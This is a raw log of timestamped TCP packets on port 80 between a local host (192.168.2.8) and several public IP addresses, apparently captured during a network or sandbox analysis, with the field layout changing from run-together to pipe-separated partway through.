                                                                    Dec 5, 2024 09:45:17.182862043 CET4973580192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:17.302772045 CET804973585.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:17.302973986 CET4973580192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:17.318989038 CET4973580192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:17.438775063 CET804973585.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:18.820046902 CET4973580192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:18.940196037 CET804973585.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:18.940299034 CET4973580192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:19.840799093 CET4973680192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:19.960679054 CET804973685.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:19.964699030 CET4973680192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:19.979989052 CET4973680192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:20.100656033 CET804973685.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:20.100981951 CET804973685.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:21.494471073 CET4973680192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:21.614588976 CET804973685.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:21.614856005 CET4973680192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:22.511415958 CET4973780192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:22.631429911 CET804973785.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:22.631525040 CET4973780192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:22.643873930 CET4973780192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:22.763981104 CET804973785.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:23.959758997 CET804973785.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:23.959876060 CET804973785.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:23.962627888 CET4973780192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:23.963655949 CET4973780192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:24.083447933 CET804973785.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:29.694278002 CET4973880192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:29.814172029 CET8049738199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:29.814301968 CET4973880192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:29.832551956 CET4973880192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:29.952276945 CET8049738199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:30.910343885 CET8049738199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:30.910367012 CET8049738199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:30.910413980 CET8049738199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:30.910450935 CET4973880192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:30.910487890 CET4973880192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:31.338510036 CET4973880192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:32.356306076 CET4973980192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:32.477157116 CET8049739199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:32.477243900 CET4973980192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:32.496433020 CET4973980192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:32.616216898 CET8049739199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:33.572592974 CET8049739199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:33.572798014 CET8049739199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:33.572812080 CET8049739199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:33.573126078 CET4973980192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:34.010540009 CET4973980192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:35.027245045 CET4974080192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:35.147119045 CET8049740199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:35.154627085 CET4974080192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:35.166600943 CET4974080192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:35.286406994 CET8049740199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:35.286505938 CET8049740199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:36.342675924 CET8049740199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:36.342767000 CET8049740199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:36.342782974 CET8049740199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:36.342808962 CET4974080192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:36.342829943 CET4974080192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:36.679429054 CET4974080192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:37.698235035 CET4974180192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:37.818372011 CET8049741199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:37.818546057 CET4974180192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:37.834777117 CET4974180192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:37.954585075 CET8049741199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:38.915838957 CET8049741199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:38.915883064 CET8049741199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:38.915921926 CET8049741199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:38.915975094 CET4974180192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:38.916013956 CET4974180192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:38.919173956 CET4974180192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:39.039120913 CET8049741199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:44.517505884 CET4974280192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:44.637430906 CET804974291.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:44.637538910 CET4974280192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:44.656790972 CET4974280192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:44.776640892 CET804974291.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:45.975054979 CET804974291.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:45.975104094 CET804974291.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:45.975141048 CET804974291.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:45.975173950 CET804974291.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:45.975250006 CET4974280192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:45.975250006 CET4974280192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:46.163806915 CET4974280192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:47.183108091 CET4974380192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:47.302870035 CET804974391.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:47.306761980 CET4974380192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:47.323132992 CET4974380192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:47.442935944 CET804974391.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:48.700352907 CET804974391.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:48.700423956 CET804974391.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:48.700437069 CET804974391.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:48.700488091 CET4974380192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:48.700536966 CET804974391.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:48.700586081 CET4974380192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:48.835949898 CET4974380192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:49.856661081 CET4974480192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:49.976475000 CET804974491.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:49.976677895 CET4974480192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:49.991933107 CET4974480192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:50.112004995 CET804974491.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:50.112035990 CET804974491.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:51.317899942 CET804974491.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:51.317970037 CET804974491.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:51.317985058 CET804974491.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:51.318120956 CET804974491.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:51.318255901 CET4974480192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:51.318255901 CET4974480192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:51.510570049 CET4974480192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:52.526997089 CET4974580192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:52.646822929 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:52.646907091 CET4974580192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:52.658715963 CET4974580192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:52.778537989 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.979439974 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.979496002 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.979507923 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.979556084 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.979598045 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.979618073 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.979626894 CET4974580192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:53.979630947 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.979628086 CET4974580192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:53.979671955 CET4974580192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:53.979959965 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.980048895 CET4974580192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:53.989279032 CET4974580192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:54.110023022 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:59.490906000 CET4974680192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:45:59.610682964 CET804974613.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:45:59.610816002 CET4974680192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:45:59.626393080 CET4974680192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:45:59.746524096 CET804974613.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:00.711502075 CET804974613.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:00.711560965 CET4974680192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:01.132739067 CET4974680192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:01.252553940 CET804974613.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:02.153126955 CET4974780192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:02.273017883 CET804974713.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:02.273113012 CET4974780192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:02.295723915 CET4974780192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:02.415682077 CET804974713.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:03.371035099 CET804974713.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:03.371191025 CET4974780192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:03.804495096 CET4974780192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:03.924418926 CET804974713.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:04.824455023 CET4974880192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:04.946221113 CET804974813.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:04.946317911 CET4974880192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:04.960588932 CET4974880192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:05.080426931 CET804974813.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:05.080445051 CET804974813.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:06.044872999 CET804974813.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:06.046706915 CET4974880192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:06.476407051 CET4974880192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:06.596086025 CET804974813.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:07.497328043 CET4974980192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:07.617122889 CET804974913.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:07.617291927 CET4974980192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:07.626533985 CET4974980192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:07.746872902 CET804974913.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:08.717693090 CET804974913.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:08.717731953 CET804974913.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:08.717860937 CET4974980192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:08.721113920 CET4974980192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:08.841018915 CET804974913.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:14.313292980 CET4975080192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:14.433335066 CET8049750185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:14.433440924 CET4975080192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:14.634778023 CET4975080192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:14.754682064 CET8049750185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:15.690886021 CET8049750185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:15.690908909 CET8049750185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:15.691021919 CET4975080192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:16.148415089 CET4975080192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:17.166526079 CET4975180192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:17.286534071 CET8049751185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:17.288963079 CET4975180192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:17.300817013 CET4975180192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:17.420897961 CET8049751185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:18.538708925 CET8049751185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:18.538731098 CET8049751185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:18.538809061 CET4975180192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:18.822711945 CET4975180192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:19.844897985 CET4975280192.168.2.8185.27.134.144
Dec 5, 2024 09:46:19.964899063 CET | 80 | 49752 | 185.27.134.144 | 192.168.2.8
Dec 5, 2024 09:46:19.965053082 CET | 49752 | 80 | 192.168.2.8 | 185.27.134.144
Dec 5, 2024 09:46:19.980600119 CET | 49752 | 80 | 192.168.2.8 | 185.27.134.144
Dec 5, 2024 09:46:20.100478888 CET | 80 | 49752 | 185.27.134.144 | 192.168.2.8
Dec 5, 2024 09:46:20.100519896 CET | 80 | 49752 | 185.27.134.144 | 192.168.2.8
Dec 5, 2024 09:46:21.214456081 CET | 80 | 49752 | 185.27.134.144 | 192.168.2.8
Dec 5, 2024 09:46:21.214613914 CET | 80 | 49752 | 185.27.134.144 | 192.168.2.8
Dec 5, 2024 09:46:21.217601061 CET | 49752 | 80 | 192.168.2.8 | 185.27.134.144
Dec 5, 2024 09:46:21.492260933 CET | 49752 | 80 | 192.168.2.8 | 185.27.134.144
Dec 5, 2024 09:46:22.512017012 CET | 49753 | 80 | 192.168.2.8 | 185.27.134.144
Dec 5, 2024 09:46:22.632590055 CET | 80 | 49753 | 185.27.134.144 | 192.168.2.8
Dec 5, 2024 09:46:22.632692099 CET | 49753 | 80 | 192.168.2.8 | 185.27.134.144
Dec 5, 2024 09:46:22.649477005 CET | 49753 | 80 | 192.168.2.8 | 185.27.134.144
Dec 5, 2024 09:46:22.769272089 CET | 80 | 49753 | 185.27.134.144 | 192.168.2.8
Dec 5, 2024 09:46:23.882405043 CET | 80 | 49753 | 185.27.134.144 | 192.168.2.8
Dec 5, 2024 09:46:23.882426977 CET | 80 | 49753 | 185.27.134.144 | 192.168.2.8
Dec 5, 2024 09:46:23.882891893 CET | 49753 | 80 | 192.168.2.8 | 185.27.134.144
Dec 5, 2024 09:46:23.886688948 CET | 49753 | 80 | 192.168.2.8 | 185.27.134.144
Dec 5, 2024 09:46:24.006453037 CET | 80 | 49753 | 185.27.134.144 | 192.168.2.8
Dec 5, 2024 09:46:30.038708925 CET | 49754 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:30.158567905 CET | 80 | 49754 | 85.159.66.93 | 192.168.2.8
Dec 5, 2024 09:46:30.158920050 CET | 49754 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:30.178348064 CET | 49754 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:30.298238993 CET | 80 | 49754 | 85.159.66.93 | 192.168.2.8
Dec 5, 2024 09:46:31.679721117 CET | 49754 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:31.800103903 CET | 80 | 49754 | 85.159.66.93 | 192.168.2.8
Dec 5, 2024 09:46:31.802788973 CET | 49754 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:32.698673964 CET | 49755 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:32.818728924 CET | 80 | 49755 | 85.159.66.93 | 192.168.2.8
Dec 5, 2024 09:46:32.818870068 CET | 49755 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:32.833400011 CET | 49755 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:32.953290939 CET | 80 | 49755 | 85.159.66.93 | 192.168.2.8
Dec 5, 2024 09:46:34.335923910 CET | 49755 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:34.456326008 CET | 80 | 49755 | 85.159.66.93 | 192.168.2.8
Dec 5, 2024 09:46:34.456386089 CET | 49755 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:35.358730078 CET | 49756 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:35.478949070 CET | 80 | 49756 | 85.159.66.93 | 192.168.2.8
Dec 5, 2024 09:46:35.482848883 CET | 49756 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:35.497387886 CET | 49756 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:35.617311001 CET | 80 | 49756 | 85.159.66.93 | 192.168.2.8
Dec 5, 2024 09:46:35.617373943 CET | 80 | 49756 | 85.159.66.93 | 192.168.2.8
Dec 5, 2024 09:46:37.007802963 CET | 49756 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:37.128118038 CET | 80 | 49756 | 85.159.66.93 | 192.168.2.8
Dec 5, 2024 09:46:37.128215075 CET | 49756 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:38.028749943 CET | 49757 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:38.148845911 CET | 80 | 49757 | 85.159.66.93 | 192.168.2.8
Dec 5, 2024 09:46:38.152889967 CET | 49757 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:38.160312891 CET | 49757 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:38.280179977 CET | 80 | 49757 | 85.159.66.93 | 192.168.2.8
Dec 5, 2024 09:46:39.481437922 CET | 80 | 49757 | 85.159.66.93 | 192.168.2.8
Dec 5, 2024 09:46:39.481548071 CET | 80 | 49757 | 85.159.66.93 | 192.168.2.8
Dec 5, 2024 09:46:39.481719017 CET | 49757 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:39.484298944 CET | 49757 | 80 | 192.168.2.8 | 85.159.66.93
Dec 5, 2024 09:46:39.604135036 CET | 80 | 49757 | 85.159.66.93 | 192.168.2.8
Dec 5, 2024 09:46:45.016179085 CET | 49758 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:45.136315107 CET | 80 | 49758 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:45.136560917 CET | 49758 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:45.150978088 CET | 49758 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:45.272155046 CET | 80 | 49758 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:46.664366961 CET | 49758 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:46.680783033 CET | 80 | 49758 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:46.680836916 CET | 49758 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:46.680866957 CET | 80 | 49758 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:46.680907965 CET | 49758 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:46.784284115 CET | 80 | 49758 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:46.784347057 CET | 49758 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:47.683188915 CET | 49759 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:47.803061962 CET | 80 | 49759 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:47.803678036 CET | 49759 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:47.818855047 CET | 49759 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:47.938694000 CET | 80 | 49759 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:49.320276976 CET | 49759 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:49.339220047 CET | 80 | 49759 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:49.339238882 CET | 80 | 49759 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:49.339678049 CET | 49759 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:49.339678049 CET | 49759 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:49.440260887 CET | 80 | 49759 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:49.440567970 CET | 49759 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:50.340821981 CET | 49760 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:50.460640907 CET | 80 | 49760 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:50.460733891 CET | 49760 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:50.479295969 CET | 49760 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:50.599144936 CET | 80 | 49760 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:50.599179983 CET | 80 | 49760 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:51.992855072 CET | 49760 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:52.001822948 CET | 80 | 49760 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:52.001878023 CET | 80 | 49760 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:52.002098083 CET | 49760 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:52.002098083 CET | 49760 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:52.112945080 CET | 80 | 49760 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:52.113085032 CET | 49760 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:53.010510921 CET | 49761 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:53.130770922 CET | 80 | 49761 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:53.131067991 CET | 49761 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:53.139818907 CET | 49761 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:53.259605885 CET | 80 | 49761 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:54.675735950 CET | 80 | 49761 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:54.675756931 CET | 80 | 49761 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:46:54.675852060 CET | 49761 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:54.678883076 CET | 49761 | 80 | 192.168.2.8 | 154.23.184.207
Dec 5, 2024 09:46:54.798728943 CET | 80 | 49761 | 154.23.184.207 | 192.168.2.8
Dec 5, 2024 09:47:00.383096933 CET | 49762 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:00.503037930 CET | 80 | 49762 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:00.503114939 CET | 49762 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:00.526082993 CET | 49762 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:00.646018028 CET | 80 | 49762 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:01.837007999 CET | 80 | 49762 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:01.837025881 CET | 80 | 49762 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:01.837044954 CET | 80 | 49762 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:01.837078094 CET | 49762 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:01.837109089 CET | 80 | 49762 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:01.837770939 CET | 49762 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:02.039045095 CET | 49762 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:03.174791098 CET | 49763 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:03.294687033 CET | 80 | 49763 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:03.295020103 CET | 49763 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:03.727638960 CET | 49763 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:03.847785950 CET | 80 | 49763 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:04.619647980 CET | 80 | 49763 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:04.619810104 CET | 80 | 49763 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:04.619827032 CET | 80 | 49763 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:04.619904041 CET | 49763 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:04.620053053 CET | 80 | 49763 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:04.620094061 CET | 49763 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:05.242216110 CET | 49763 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:06.260871887 CET | 49764 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:06.380755901 CET | 80 | 49764 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:06.380887985 CET | 49764 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:06.796376944 CET | 49764 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:06.916348934 CET | 80 | 49764 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:06.916385889 CET | 80 | 49764 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:07.713207006 CET | 80 | 49764 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:07.713260889 CET | 80 | 49764 | 194.58.112.174 | 192.168.2.8
